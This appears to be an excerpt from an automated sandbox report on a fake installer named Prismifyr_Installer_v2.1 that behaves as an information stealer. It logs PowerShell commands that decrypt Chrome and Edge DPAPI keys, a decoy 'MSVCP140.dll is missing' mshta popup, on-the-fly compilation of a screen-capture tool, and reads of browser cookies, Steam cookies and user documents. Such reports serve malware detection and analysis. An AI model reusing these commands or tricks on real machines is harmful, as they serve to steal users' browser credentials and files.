Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'CurrentUser')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe screenCapture_1.3.2.exe "C:\Users\user\AppData\Local\Temp\2024924-64-yswszl.55ad9.png"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9E2A.tmp" "c:\Users\user\AppData\Local\Temp\screenCapture\CSCEE08CA83D7542AAB04A7698A66ECD4F.TMP"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:new ActiveXObject('WScript.Shell').Popup('The program can not start because MSVCP140.dll is missing from your computer. Try reinstalling the program to fix this problem.', 0, 'Error', 16);close()"
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe "c:\users\user\appdata\local\programs\prismifyr_installer_v2.1\prismifyr_installer_v2.1.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\prismifyr_installer_v2.1" --gpu-preferences=uaaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaeaaaaaaaaabaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabaaaaaaaaaaeaaaaaaaaaaiaaaaaaaaaagaaaaaaaaa --field-trial-handle=2244,i,14912361022600860785,9095772362069922900,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe "c:\users\user\appdata\local\programs\prismifyr_installer_v2.1\prismifyr_installer_v2.1.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\prismifyr_installer_v2.1" --field-trial-handle=2516,i,14912361022600860785,9095772362069922900,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=2512 /prefetch:3
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'currentuser')"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'currentuser')
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'currentuser')"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'currentuser')
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "start /b cmd /c mshta "javascript:new activexobject('wscript.shell').popup('the program can not start because msvcp140.dll is missing from your computer. try reinstalling the program to fix this problem.', 0, 'error', 16);close()""
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe "c:\users\user\appdata\local\programs\prismifyr_installer_v2.1\prismifyr_installer_v2.1.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\prismifyr_installer_v2.1" --gpu-preferences=uaaaaaaaaadgaaamaaaaaaaaaaaaaaaaaabgaaeaaaaaaaaabaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabaaaaaaaaaaeaaaaaaaaaaiaaaaaaaaaagaaaaaaaaa --field-trial-handle=2244,i,14912361022600860785,9095772362069922900,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe "c:\users\user\appdata\local\programs\prismifyr_installer_v2.1\prismifyr_installer_v2.1.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\prismifyr_installer_v2.1" --field-trial-handle=2516,i,14912361022600860785,9095772362069922900,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=2512 /prefetch:3Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'currentuser')"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'currentuser')"Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "start /b cmd /c mshta "javascript:new activexobject('wscript.shell').popup('the program can not start because msvcp140.dll is missing from your computer. try reinstalling the program to fix this problem.', 0, 'error', 16);close()""Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'currentuser')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'currentuser')
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ..\..\third_party\webrtc\modules\desktop_capture\win\window_capture_utils.ccFail to create instance of VirtualDesktopManagerChrome_WidgetWin_Progman..\..\third_party\webrtc\modules\desktop_capture\cropping_window_capturer.ccWindow no longer on top when ScreenCapturer finishesScreenCapturer failed to capture a frameWindow rect is emptyWindow is outside of the captured displaySysShadowWebRTC.DesktopCapture.Win.WindowGdiCapturerFrameTime..\..\third_party\webrtc\modules\desktop_capture\win\window_capturer_win_gdi.ccWindow hasn't been selected: Target window has been closed.Failed to get drawable window area: Failed to get window DC: Failed to create frame.Both PrintWindow() and BitBlt() failed.Capturing owned window failed (previous error/warning pertained to that)WindowCapturerWinGdi::CaptureFrameWebRTC.DesktopCapture.BlankFrameDetectedWebRTC.DesktopCapture.PrimaryCapturerSelectSourceErrorWebRTC.DesktopCapture.PrimaryCapturerErrorWebRTC.DesktopCapture.PrimaryCapturerPermanentErrordwmapi.dllDwmEnableComposition..\..\third_party\webrtc\modules\desktop_capture\win\screen_capturer_win_gdi.ccFailed to capture screen by GDI.WebRTC.DesktopCapture.Win.ScreenGdiCapturerFrameTimedesktop_dc_memory_dc_Failed to get screen rect.Failed to create frame buffer.Failed to select current bitmap into memery dc.BitBlt failedScreenCapturerWinGdi::CaptureFrame..\..\third_party\webrtc\modules\desktop_capture\win\cursor.ccwebrtc::CreateMouseCursorFromHCursorUnable to get cursor icon info. Error = Unable to get bitmap info. Error = Unable to get bitmap bits. Error = `
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web.db VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\ProgramData\Steam\Launcher\2bqvZYHO\EN-472847\Cookies VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\ProgramData\Steam\Launcher\2bqvZYHO\EN-472847\Cookies VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Videos VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Videos\desktop.ini VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Desktop\BNAGMGSPLO.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Desktop\EEGWXUHVUG.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Desktop\EFOYFBOLXA.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Desktop\EWZCVGNOWT.png VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.xlsx VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Desktop\GIGIYTFFYT VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Desktop\NWCXBPIUYI VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Desktop\QCFWYSKMHA VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Music VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Documents\QNCYCDFIJJ.pdf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Documents\SUAVTZKNFL.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Documents\ZGGKNSUKOP.mp3 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Downloads VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeQueries volume information: C:\Users\user\Downloads\EEGWXUHVUG.png VolumeInformationJump to behavior
